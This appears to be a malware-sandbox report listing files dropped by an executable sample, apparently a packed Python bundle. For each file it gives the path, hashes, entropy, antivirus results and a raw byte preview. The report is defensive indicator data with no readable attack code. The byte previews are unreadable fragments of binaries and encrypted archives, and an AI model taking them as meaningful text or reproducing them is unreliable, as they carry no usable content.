                                                                                                                                                                                                                                      SSDEEP:24:H4gO9g1NP5tKHNwKa6NeI+ycuZhNXakSJPNnqSQEgd:YKPh4OKa6w1ulXa3rqSZ0
                                                                                                                                                                                                                                      MD5:70D3D306391DA5F2C405AD3CE2657C03
                                                                                                                                                                                                                                      SHA1:A1D38EC5C06BD314EE31E04085784FA865C094BB
                                                                                                                                                                                                                                      SHA-256:45959B632977A5529EA1B4A655A313720A6C717C5A0CB6267707B71B086DF172
                                                                                                                                                                                                                                      SHA-512:13C2F972CEB7A79F3F4E09A011336B0C277C19D56C8B81219AE714619D7347223BDA95AB07B7B7C7E8310647DC61B73D355562CFBA1BEBA46C254819B1522121
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:L.....yg.............debug$S........|...................@..B.rsrc$01........X.......`...........@..@.rsrc$02........P...j...............@..@........U....c:\Users\user\AppData\Local\Temp\3lfchnc2\CSC30375EB9C2504D3B856F38EEC7AAE920.TMP..................~[..:.)..................5.......C:\Users\user\AppData\Local\Temp\RESF89E.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.l.f.c.h.n.c.2...d.l.l.....(.....L.e.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI61762\VCRUNTIME140.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):109392
                                                                                                                                                                                                                                      Entropy (8bit):6.643764685776923
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:DcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/Auecbq8qZU34zW/K0zD:DV3iC0h9q4v6XjKAuecbq8qGISb/
                                                                                                                                                                                                                                      MD5:870FEA4E961E2FBD00110D3783E529BE
                                                                                                                                                                                                                                      SHA1:A948E65C6F73D7DA4FFDE4E8533C098A00CC7311
                                                                                                                                                                                                                                      SHA-256:76FDB83FDE238226B5BEBAF3392EE562E2CB7CA8D3EF75983BF5F9D6C7119644
                                                                                                                                                                                                                                      SHA-512:0B636A3CDEFA343EB4CB228B391BB657B5B4C20DF62889CD1BE44C7BEE94FFAD6EC82DC4DB79949EDEF576BFF57867E0D084E0A597BF7BF5C8E4ED1268477E88
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                      • Filename: Holoscope-V1.3.5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: dsoft.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: winws1.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: discord.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: cmd.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: NEVER OPEN!.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: HeilHitler.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: meN9qeS2DE.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: client1.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........u...u...u.E.t...u.....u...t...u..v...u..q...u..p...u..u...u......u..w...u.Rich..u.........PE..d.....y..........." ...".....`.......................................................5....`A........................................`C..4....K...............p.......\..PO...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata.......p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI61762\_bz2.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):49432
                                                                                                                                                                                                                                      Entropy (8bit):7.811659052043441
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:0iulhAbgFQ1/NGSS1xNDrxiRx8/CWpsVDIA32w1Nep83IJCV1RU5YiSyvrjPxWER:0iiGgF1TxbYecf1R3IJCV1U7SyTjPxL
                                                                                                                                                                                                                                      MD5:83B5D1943AC896A785DA5343614B16BC
                                                                                                                                                                                                                                      SHA1:9D94B7F374030FED7F6E876434907561A496F5D9
                                                                                                                                                                                                                                      SHA-256:BF79DDBFA1CC4DF7987224EE604C71D9E8E7775B9109BF4FF666AF189D89398A
                                                                                                                                                                                                                                      SHA-512:5E7DCC80AC85BD6DFC4075863731EA8DA82EDBB3F8FFAFBA7B235660A1BD0C60F7DFDE2F7E835379388DE277F9C1CEAE7F209495F868CB2BD7DB0DE16495633C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u............l`.....h......h......h......h......h.....bh......l............bh.....bh.....bh.....bh.....Rich....................PE..d......c.........." ..."............pd....................................................`.............................................H.................... .. ..................................................pp..@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI61762\_ctypes.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):59664
                                                                                                                                                                                                                                      Entropy (8bit):7.830617969064045
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:nUOlRJUIp/i+OnIlnpJ8+j46IJLPF47SyHPxr:UOpnomlnpJPk6IJLPF4Vxr
                                                                                                                                                                                                                                      MD5:7ECC651B0BCF9B93747A710D67F6C457
                                                                                                                                                                                                                                      SHA1:EBB6DCD3998AF9FFF869184017F2106D7A9C18F3
                                                                                                                                                                                                                                      SHA-256:B43963B0883BA2E99F2B7DD2110D33063071656C35E6575FCA203595C1C32B1A
                                                                                                                                                                                                                                      SHA-512:1FF4837E100BC76F08F4F2E9A7314BCAF23EBFA4F9A82DC97615CDE1F3D29416004C6346E51AFC6E61360573DF5FCD2A3B692FD544CCAD5C616FB63AC49303C5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........z..N...N...N...Gc..H....g..L....g..B....g..F....g..J....g..L....c..O....c..H....`..M...N........g..H....g..O....gv.O....g..O...RichN...........................PE..d....~.c.........." ...".........`.......p...................................0............`.........................................H,.......)....... .......................,..........................................@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI61762\_decimal.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):109328
                                                                                                                                                                                                                                      Entropy (8bit):7.930840371852251
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:pUOy4s97sRfmdE9MwgHYofX/oImJNdhK2cLxIJOqzCecxZ:pUObkNdEewJofPRmjdhKtqC/
                                                                                                                                                                                                                                      MD5:0CFE09615338C6450AC48DD386F545FD
                                                                                                                                                                                                                                      SHA1:61F5BD7D90EC51E4033956E9AE1CFDE9DC2544FE
                                                                                                                                                                                                                                      SHA-256:A0FA3AD93F98F523D189A8DE951E42F70CC1446793098151FC50BA6B5565F2E3
                                                                                                                                                                                                                                      SHA-512:42B293E58638074CE950775F5EF10EC1A0BB5980D0DF74AD89907A17F7016D68E56C6DED1338E9D04D19651F48448DEEE33A0657D3C03ADBA89406D6E5F10C18
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}RT...T...T...]...Z.......V.......Y.......\.......P.......W.......V...T..........U.......[.......U.......U.......U...RichT...................PE..d....~.c.........." ...".p..........P........................................0............`..........................................,..P....)....... ...........&...........-......................................P...@...........................................UPX0....................................UPX1.....p.......j..................@....rsrc........ .......n..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI61762\_hashlib.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):36112
                                                                                                                                                                                                                                      Entropy (8bit):7.6901751795487705
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:Y1cXZ8iY8JshuGfJ5fA0EphrzIJOI40W5YiSyvVPxWExHd0:4SYZhu25I0OrzIJOI40s7SydPxPK
                                                                                                                                                                                                                                      MD5:7EDB6C172C0E44913E166ABB50E6FBA6
                                                                                                                                                                                                                                      SHA1:3F8C7D0FF8981D49843372572F93A6923F61E8ED
                                                                                                                                                                                                                                      SHA-256:258AD0D7E8B2333B4B260530E14EBE6ABD12CAE0316C4549E276301E5865B531
                                                                                                                                                                                                                                      SHA-512:2A59CC13A151D8800A29B4F9657165027E5BF62BE1D13C2E12529EF6B7674657435BFD3CC16500B2AA7CE95B405791DD007C01ADF4CDD229746BD2218BFDC03F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A.g...g...g....2..g.......g.......g.......g.......g..g....g.......g.......g...g..!g..g....g..g....g..g.^..g..g....g..Rich.g..........................PE..d......c.........." ...".P..........P .......................................@............`..........................................;..P....9.......0..........,............;......................................P,..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI61762\_lzma.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):87824
                                                                                                                                                                                                                                      Entropy (8bit):7.9184368617158984
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:TxZh3A5zFTPuztVVQW1AyOXEyvYsnHUZK+K+k6V/busIJZ1Ow7SycfxPxPD:NvA5utzWfXE0V0ZK+K+ZdIJZ1Owqf1xL
                                                                                                                                                                                                                                      MD5:71F0B9F90AA4BB5E605DF0EA58673578
                                                                                                                                                                                                                                      SHA1:C7C01A11B47DC6A447C7475EF6BA7DEC7C7BA24E
                                                                                                                                                                                                                                      SHA-256:D0E10445281CF3195C2A1AA4E0E937D69CAE07C492B74C9C796498DB33E9F535
                                                                                                                                                                                                                                      SHA-512:FC63B8B48D6786CAECAF1AA3936E5F2D8FCF44A5A735F56C4200BC639D0CB9C367151A7626AA5384F6FC126A2BD0F068F43FD79277D7EC9ADFC4DCB4B8398AE2
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.*C#.D.#.D.#.D.*...'.D.l.E.!.D.l.A./.D.l.@.+.D.l.G. .D...E. .D.h.E.!.D.#.E.E.D...I...D...D.".D....".D...F.".D.Rich#.D.................PE..d......c.........." ...". ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI61762\_queue.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):26384
                                                                                                                                                                                                                                      Entropy (8bit):7.483158880239005
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:yihFw4wEcpDjIJQU4p5YiSyvpKHPxWEx7M:ZwEcjIJQU437SyhKHPxDM
                                                                                                                                                                                                                                      MD5:F1E7C157B687C7E041DEADD112D61316
                                                                                                                                                                                                                                      SHA1:2A7445173518A342D2E39B19825CF3E3C839A5FE
                                                                                                                                                                                                                                      SHA-256:D92EADB90AED96ACB5FAC03BC79553F4549035EA2E9D03713D420C236CD37339
                                                                                                                                                                                                                                      SHA-512:982FD974E5892AF9F360DC4C7CCAA59928E395CCEF8EA675FADB4CF5F16B29350BF44C91EA1FD58D90CBCA02522EBA9543162E19C38817EDBFD118BC254515DA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._XF.1.F.1.F.1.O...D.1...0.D.1...4.J.1...5.N.1...2.E.1...0.E.1...0.D.1.F.0...1...<.G.1...1.G.1.....G.1...3.G.1.RichF.1.........PE..d....~.c.........." ...".0................................................................`.............................................L.......P............`..............<...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI61762\_socket.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):44304
                                                                                                                                                                                                                                      Entropy (8bit):7.708369428558094
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:oQ8MABQICFr2Tg+z2uPxYEV/WJqOxUbOD9p0bmIJLw1Fu5YiSyvYPxWExAGUd:oTiFtipt/MLk2sbmIJLw1FE7SygPxYd
                                                                                                                                                                                                                                      MD5:57DC6A74A8F2FAACA1BA5D330D7C8B4B
                                                                                                                                                                                                                                      SHA1:905D90741342AC566B02808AD0F69E552BB08930
                                                                                                                                                                                                                                      SHA-256:5B73B9EA327F7FB4CEFDDD65D6050CDEC2832E2E634FCBF4E98E0F28D75AD7CA
                                                                                                                                                                                                                                      SHA-512:5E2B882FC51F48C469041028B01F6E2BFAF5A49005ADE7E82ACB375709E74AD49E13D04FD7ACB6C0DBE05F06E9966A94753874132BAF87858E1A71DCFFC1DC07
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........YY..87..87..87..@...87..D6..87..D2..87..D3..87..D4..87..D6..87..86.z87..@6..87..D:..87..D7..87..D...87..D5..87.Rich.87.........................PE..d......c.........." ...".p..........`m....................................................`.............................................P.......h............ ..x...........X.......................................py..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc................p..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI61762\_sqlite3.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):57616
                                                                                                                                                                                                                                      Entropy (8bit):7.833064803996473
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:s11OB9LTyHEhkBFl837aWkr5LL08XEFIJOQFl7SysPxd:sS/LTyHRTU1k1L48XqIJOQFlyxd
                                                                                                                                                                                                                                      MD5:72A0715CB59C5A84A9D232C95F45BF57
                                                                                                                                                                                                                                      SHA1:3ED02AA8C18F793E7D16CC476348C10CE259FEB7
                                                                                                                                                                                                                                      SHA-256:D125E113E69A49E46C5534040080BDB35B403EB4FF4E74ABF963BCE84A6C26AD
                                                                                                                                                                                                                                      SHA-512:73C0E768EE0C2E6AC660338D2268540254EFE44901E17271595F20F335ADA3A9A8AF70845E8A253D83A848D800145F7ECB23C92BE90E7DD6E5400F72122D09DE
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................n............................................9.......................9.....9.......9.......9.......Rich............PE..d......c.........." ...".........`..0....p...................................0............`..........................................+..P....)....... .......................+..$...................................0...@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI61762\_ssl.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):63768
                                                                                                                                                                                                                                      Entropy (8bit):7.851921093820031
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:zBEP8gL60s9SRCCtqClb8pIJC7+757SyhQPxZ4:NE0OsiaClbmIJC7+9IxZ
                                                                                                                                                                                                                                      MD5:8F94142C7B4015E780011C1B883A2B2F
                                                                                                                                                                                                                                      SHA1:C9C3C1277CCA1E8FE8DB366CA0ECB4A264048F05
                                                                                                                                                                                                                                      SHA-256:8B6C028A327E887F1B2CCD35661C4C7C499160E0680CA193B5C818327A72838C
                                                                                                                                                                                                                                      SHA-512:7E29163A83601ED1078C03004B3D40542E261FDA3B15F22C2FEEC2531B05254189AE1809C71F9DF78A460BF2282635E2287617F2992B6B101854DDD74FCAD143
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4.i,4.i,4.i,=..,2.i,{.h-6.i,{.l-9.i,{.m-<.i,{.j-7.i,..h-6.i,..h-0.i,4.h,..i,..h-3.i,..d-6.i,..i-5.i,...,5.i,..k-5.i,Rich4.i,................PE..d......c.........." ..."............P.....................................................`.........................................p...d....................P......................................................`...@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1437271
                                                                                                                                                                                                                                      Entropy (8bit):5.591062477999891
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:mQR5pATt7xm4lUKdcubgAnyfb030iwhJdYf9PIsoHHN:mQR5pQxmgPc
                                                                                                                                                                                                                                      MD5:1C9A020E8BFC99A77F51C7D5CEB937F1
                                                                                                                                                                                                                                      SHA1:9B2C6F0C4D16AC0B69E5232648B6E6C5DF39CD9C
                                                                                                                                                                                                                                      SHA-256:2CE10A77F29612F9AFD3FB21BAAF38162FDC484174AEC051A32EEAEF28CE8B37
                                                                                                                                                                                                                                      SHA-512:98312712C4BE133D979B9699E661C451CD8C27AE4C5ABC295C359FD857D20B3FDE55E6555BDD2230D580903BB230798FBA2C72381B263327F5D0820D28DDFBEA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PK..........!.h%..b...b......._collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI61762\blank.aes

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):120956
                                                                                                                                                                                                                                      Entropy (8bit):7.694151487163349
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:13U3tlWj4YTIVlHMn/QKhuRdynBIT2SkpHpf77/ZU6e:12tlWj4pu/MwOzkHpf77/ZU6e
                                                                                                                                                                                                                                      MD5:0EB5FDAD2EB0292377B424E534192206
                                                                                                                                                                                                                                      SHA1:B9EC0457F7DB182B2FFC13FADCECC601BF3E32F0
                                                                                                                                                                                                                                      SHA-256:EB6462368D133919B507E6E613CCCE73A92142E8351566A24F1ADB8F771B2877
                                                                                                                                                                                                                                      SHA-512:5480F7E8DA8C535B2622B1EB88AC39EB5DDF64D3D973966655E01268CA5278E0813A93CADEA634F92BC39688975D5A21CC97B7A4A0D13C6D7FE774C2BA942DDD
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:PK........8)$Z...............stub-o.pyc..........xg*I........................j.......e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI61762\libcrypto-1_1.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1107800
                                                                                                                                                                                                                                      Entropy (8bit):7.937980722134978
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:PwE/QASFe309yYRrVcjz8suN+2r7qL18D+/81CPwDv3uFfJm:4QBkIYPcnY/qR8DU81CPwDv3uFfJm
                                                                                                                                                                                                                                      MD5:E5AECAF59C67D6DD7C7979DFB49ED3B0
                                                                                                                                                                                                                                      SHA1:B0A292065E1B3875F015277B90D183B875451450
                                                                                                                                                                                                                                      SHA-256:9D2257D0DE8172BCC8F2DBA431EB91BD5B8AC5A9CBE998F1DCAC0FAC818800B1
                                                                                                                                                                                                                                      SHA-512:145EAA969A1A14686AB99E84841B0998CF1F726709CCD177ACFB751D0DB9AA70006087A13BF3693BC0B57A0295A48C631D0B80C52472C97EBE88BE5C528022B4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............H...H...H..#H...H..I...H..I...H..I...H..I...H...H"..Hn.I...H..I...H..I..H..I...H..OH...H..I...HRich...H........PE..d...'{.c.........." ..."..........&. 25...&..................................P7...........`......................................... H5......C5.h....@5......`2.............H7.....................................8>5.@...........................................UPX0......&.............................UPX1..........&.....................@....rsrc........@5.....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI61762\libffi-8.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):28504
                                                                                                                                                                                                                                      Entropy (8bit):7.670252824661268
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:tp/6aepjG56w24apnpiYiSyvOPxWESW7t:HA154ypi7SymPxlp
                                                                                                                                                                                                                                      MD5:87786718F8C46D4B870F46BCB9DF7499
                                                                                                                                                                                                                                      SHA1:A63098AABE72A3ED58DEF0B59F5671F2FD58650B
                                                                                                                                                                                                                                      SHA-256:1928574A8263D2C8C17DF70291F26477A1E5E8B3B9AB4C4FF301F3BC5CE5CA33
                                                                                                                                                                                                                                      SHA-512:3ABF0A3448709DA6B196FE9238615D9D0800051786C9691F7949ABB3E41DFB5BDAF4380A620E72E1DF9E780F9F34E31CAAD756D2A69CAD894E9692AA161BE9F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.r...........................Y...........;....................................................Rich............PE..d....-c.........." ...!.@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI61762\libssl-1_1.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):208224
                                                                                                                                                                                                                                      Entropy (8bit):7.926130736334921
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:dkqFpMp50kT4+NfKM8oaRdGYRNXzpAWX:dvFeH0+bSM8oaRHN
                                                                                                                                                                                                                                      MD5:7BCB0F97635B91097398FD1B7410B3BC
                                                                                                                                                                                                                                      SHA1:7D4FC6B820C465D46F934A5610BC215263EE6D3E
                                                                                                                                                                                                                                      SHA-256:ABE8267F399A803224A1F3C737BCA14DEE2166BA43C1221950E2FBCE1314479E
                                                                                                                                                                                                                                      SHA-512:835BAB65D00884912307694C36066528E7B21F3B6E7A1B9C90D4DA385334388AF24540B9D7A9171E89A4802612A8B6523C77F4752C052BF47ADBD6839BC4B92C
                                                                                                                                                                                                                                      Malicious:false
